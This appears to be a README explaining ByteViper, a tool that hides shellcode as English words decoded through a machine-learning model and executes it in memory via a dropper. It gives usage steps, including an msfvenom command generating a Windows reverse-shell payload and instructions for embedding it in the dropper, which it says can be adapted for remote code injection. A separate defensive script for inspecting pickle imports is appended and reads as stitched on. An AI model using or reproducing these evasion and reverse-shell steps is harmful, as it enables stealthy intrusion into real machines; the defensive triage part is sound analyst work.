# Source code explanation

The source code is at <https://github.com/ghostpepper108/ByteViper/>

**TLDR:** After the AI module generates the payload and the dropper is compiled with that AI-generated payload, the dropper is executed. The dropper connects to the AI module and sends the English words one by one; the pre-trained model in the AI module then uses a mathematical function to fetch the payload from the vectors for those English words.

This project has the following files, explained below.

1. payload-generator.py: This is a payload generator created by the Byte Viper AI engine. It converts a raw hex payload (for example, from msfvenom) into its mathematical representation as vectors using the pre-trained machine-learning model. Here are the instructions on how to use it.

   * Create a working payload. For instance, an msfvenom payload would be

   `msfvenom -p x64 --platform windows -p windows/x64/shell_reverse_tcp lhost= lport= -f c`

   * You would get something like `\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50.....`
   * Remove all `\x` and `"` so that you are left with `fc4883e4f0e8c000000041514150....` Use this as your input next.
   * You would receive the AI-generated payload, which you embed in your code.
   * A ".pkl" file that holds the vectors would also be created.
   * Place this file in the same path as your dropper binary.
   * Also place payload.py in the same path as your dropper.

2. payload.py: This Python file goes along with your dropper binary. It contains the code that gets the English words from the dropper and fetches the equivalent hex code from the AI module.

3. ByteViper.cpp: This C file is the dropper. It is just an example of how the payload is embedded, in a seemingly benign way, using English words. The code also connects to the AI module to get the raw hex code and then assembles it in memory one byte at a time, just before executing the payload. This code can be modified to use many other techniques, including remote code injection.

4. tasks.json: This is the VS Code config file that I used for compiling the code.
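For an analyst who finds the ".pkl" from item 1 next to a suspicious binary, a first triage step is to list what the file would import if loaded, without loading it, because unpickling can call arbitrary callables. The following is an added example, not part of ByteViper; the module allowlist and the sample pickles are assumptions constructed for illustration.

```python
# Added example, not ByteViper code: list the imports a .pkl would resolve on
# load by walking its opcodes with pickletools; nothing is ever unpickled.
import fractions
import pickle
import pickletools

# Assumption: top-level modules an analyst accepts in a vectors-only pickle.
EXPECTED_MODULES = {"builtins", "collections", "numpy"}
STRING_OPS = {"SHORT_BINUNICODE", "BINUNICODE", "BINUNICODE8", "UNICODE"}
MEMO_OPS = {"MEMOIZE", "PUT", "BINPUT", "LONG_BINPUT"}


def pickle_imports(data: bytes) -> list:
    """Return (module, name) pairs named by GLOBAL / STACK_GLOBAL opcodes."""
    imports, recent = [], []
    for opcode, arg, _pos in pickletools.genops(data):
        name = opcode.name
        if name in STRING_OPS:
            recent = (recent + [arg])[-2:]   # strings pushed just before
            continue
        if name in MEMO_OPS:                 # memo writes do not touch the stack
            continue
        if name == "GLOBAL":                 # protocols 0-3: arg is "module name"
            imports.append(tuple(arg.split(" ", 1)))
        elif name == "STACK_GLOBAL":         # protocol 4+: names come off the stack
            # Names fetched from the memo rather than pushed directly are
            # reported as unresolved so they still get reviewed by hand.
            imports.append(tuple(recent) if len(recent) == 2 else ("?", "?"))
        recent = []
    return imports


def unexpected_imports(data: bytes) -> list:
    """Imports whose top-level module is outside EXPECTED_MODULES."""
    return [(m, n) for m, n in pickle_imports(data)
            if m.split(".")[0] not in EXPECTED_MODULES]


# Constructed samples: a plain word-to-vector mapping, and an object whose
# class lives in a module the allowlist does not cover.
PLAIN_VECTORS = pickle.dumps({"alpha": [0.12, -0.5], "beta": [0.9, 0.3]})
OTHER_MODULE = pickle.dumps(fractions.Fraction(1, 2), protocol=4)

if __name__ == "__main__":
    for label, blob in (("plain", PLAIN_VECTORS), ("other", OTHER_MODULE)):
        print(label, pickle_imports(blob), unexpected_imports(blob))
```

Any entry returned by `unexpected_imports`, or an unresolved `("?", "?")` pair, is a reason to keep the file out of `pickle.load` and examine it in an isolated environment.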
